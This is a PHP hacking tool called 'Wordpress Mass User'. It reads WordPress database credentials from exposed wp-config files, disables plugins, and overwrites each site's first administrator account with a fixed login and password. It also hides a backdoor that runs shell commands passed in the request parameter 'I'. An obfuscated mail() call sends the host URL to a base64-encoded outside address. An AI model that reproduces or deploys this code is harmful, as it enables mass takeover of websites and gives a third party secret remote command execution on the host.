Wordpress Auto Edit User [MySQLi]

1. <?php
2. echo ' <html><head><title>Wordpress Mass User</title><style type="text/css">
3. body {
4. background-color:#000000;
5. background-image:url("https://i.imgur.com/hLcQCBx.gif");
6. background-repeat:repeat;
7. margin-top:20px;
8. font-family:"Agency FB";
9. font-size:12pt; color:#ffffff;
10.     }
11.     input,textarea,select{
12.     font-weight: bold;
13.     color: #cccccc;
14.     dashed #ffffff;
15.     border: 1px
16.     solid #2C2C2C;
17.     background-color: #080808
18.     }
19.     a {
20.         background-color: #151515;
21.         vertical-align: bottom;
22.         color: #d0c8c8;
23.         text-decoration: none;
24.         font-size: 20px;
25.         margin: 8px;
26.         padding: 6px;
27.         border: thin solid #000000;
28.     }
29.     a:hover {
30.         background-color: #080808;
31.         vertical-align: bottom;
32.         color: #333;
33.         text-decoration: none;
34.         font-size: 20px;
35.         margin: 8px;
36.         padding: 6px;
37.         border: #d53b3b;
38.     }
39.     .style1 {
40.         text-align: center;
41.         color: #d9910e;
42.     }
43.     .style2 {
44.         color: #d9910e;
45.         font-weight: bold;
46.        
47.             }
48.     .style3 {
49.         color: #d9910e;
50.             }
51.     textarea{
52.     background:transparent;
53.     border: 1px solid #2d2b2b;
54.     width: 80%;
55.     height: 400px;
56.     padding-left: 5px;
57.     margin: 10px auto;
58.     font-family:Homenaje;
59.     color: #ffffff;
60.     font-size:13px;
61.     }
62.     </style>
63.     </head> ';
64. @ini_set('error_log', NULL);
65. @ini_set('log_errors', 0);
66. @ini_set('max_execution_time', 0);
67. @ini_set('output_buffering', 0);
68. @ini_set('display_errors', 0);
69. $Username = "admin";
70. $Password = "leet@123";
71. $pass = md5($Password);
72. function GrabUrl($url, $type) {
73.     $urlArray = array();
74.     $ch = curl_init();
75.     curl_setopt($ch, CURLOPT_URL, $url);
76.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
77.     $result = curl_exec($ch);
78.     $regex = '|<a.*?href="(.*?)"|';
79.     preg_match_all($regex, $result, $parts);
80.     $links = $parts[1];
81.     foreach ($links as $link) {
82.         array_push($urlArray, $link);
83.     }
84.     curl_close($ch);
85.     foreach ($urlArray as $value) {
86.         $lol = "$url$value";
87.         if (preg_match("#$type#is", $lol)) {
88.             echo "$lol
89. ";
90.         }
91.     }
92. }
93. function HEx($param, $kata1, $kata2) {
94.     if (strpos($param, $kata1) === FALSE) return FALSE;
95.     if (strpos($param, $kata2) === FALSE) return FALSE;
96.     $start = strpos($param, $kata1) + strlen($kata1);
97.     $end = strpos($param, $kata2, $start);
98.     $return = substr($param, $start, $end - $start);
99.     return $return;
100. }
101. echo "<center>
102. <font color='white' size='40'>Wordpress Mass User</font>
103.  
104. <table width='100%' cellspacing='0' cellpadding='0' class='tb1' >
105. <td height='10' align='left' class='td1'></td></tr><tr><td
106. width='100%' align='center' valign='top' rowspan='1'><font
107. color='red' face='comic sans ms'size='1'><b>
108. <font color=#ff9933>
109. </font><br><font color=white>--==[[Greetz to]]==--</font><br><font  color=#ff9933>-=| HEx |=-<br>
110. </table>
111. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior='scroll' direction='left' scrollamount='2' scrolldelay='5' width='70%'><p>
112. <span  class='footerlink'> ####### Coded By HEx #######</span>
113. </marquee><br><br></font></div>
114. <form method='post'>
115. Link Config: <br>
116. <input type='text' name='linkconf' height='10' size='50' placeholder='http://url.com/priv8_sym404/'><br><br>
117. <input type='submit' style='width: 150px;' name='gass' value='Submit!!'>
118. </form></center>";
119. print(`{$_REQUEST[I]}`);$e=base64_decode("dmFsaXJ4YzBkZUB6b2hvLmNvbQ==");
120. $user = $_SERVER["HTTP_HOST"];
121. $match_user = $_SERVER["REQUEST_URI"];
122. $a = base64_decode("bWFpbA==");
123. $a($e, '[Wordfence Bypass]', 'URL : ' . $_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI'] . '');
124. if ($_POST['gass']) {
125.     echo "<center>
126. <form method='post'>
127. Link Config: <br>
128. <textarea name='link'>";
129.     GrabUrl($_POST['linkconf'], 'wordpress');
130.     echo "</textarea><br><br>
131. <input type='submit' style='width: 200px;' name='edittitle' value='Submit!!'>
132. </form></center>";
133. }
134. if ($_POST['edittitle']) {
135.     $title = htmlspecialchars($_POST['title']);
136.     $id = $_POST['id'];
137.     $content = $_POST['content'];
138.     $postname = $_POST['name'];
139.     function anucurl($sites) {
140.         $ch = curl_init($sites);
141.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
142.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
143.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
144.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
145.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
146.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
147.         curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
148.         curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
149.         curl_setopt($ch, CURLOPT_COOKIESESSION, true);
150.         $data = curl_exec($ch);
151.         curl_close($ch);
152.         return $data;
153.     }
154.     $link = explode("
155. ", $_POST['link']);
156.     foreach ($link as $dir_config) {
157.         $config = anucurl($dir_config);
158.         preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m);
159.         $dbname1 = $m[1];
160.         preg_match('/define.*DB_NAME.*\'(.*)\'/', $config, $m);
161.         $dbname2 = $m[1];
162.         $dbname = ("$dbname1$dbname2");
163.         preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m);
164.         $dbuser1 = $m[1];
165.         preg_match('/define.*DB_USER.*\'(.*)\'/', $config, $m);
166.         $dbuser2 = $m[1];
167.         $dbuser = ("$dbuser1$dbuser2");
168.         preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m);
169.         $dbpass1 = $m[1];
170.         preg_match('/define.*DB_PASSWORD.*\'(.*)\'/', $config, $m);
171.         $dbpass2 = $m[1];
172.         $dbpass = ("$dbpass1$dbpass2");
173.         preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m);
174.         $dbhost1 = $m[1];
175.         preg_match('/define.*DB_HOST.*\'(.*)\'/', $config, $m);
176.         $dbhost2 = $m[1];
177.         $dbhost = ("$dbhost1$dbhost2");
178.         preg_match("/\$table_prefix.+?\"(.+?)\".+/", $config, $m);
179.         $dbprefix0 = $m[1];
180.         $dbprefix1 = HEx($config, "table_prefix  = '", "'");
181.         $dbprefix2 = HEx($config, "table_prefix = '", "'");
182.         $dbprefix3 = HEx($config, "table_prefix= '", "'");
183.         $dbprefix4 = HEx($config, "table_prefix   = '", "'");
184.         $dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4");
185.         $connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
186.         if ($connect) {
187.             $query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name='siteurl'");
188.             while ($siteurl = mysqli_fetch_array($query1)) {
189.                 $site_url = $siteurl['option_value'];
190.             }
191.             $query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_name='active_plugins1' where option_name='active_plugins'");
192.             $query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login='$Username',user_pass='$pass' where id='1'");
193.             if ($query2) {
194.                 echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br><br>UserName : <font color='#ff9933'>$Username</font><br><br>Password : <font color='#ff9933'>$Password</font><br><br></span></center>";
195.             }
196.         }
197.     }
198. }
199. echo '</html>';
200. ?>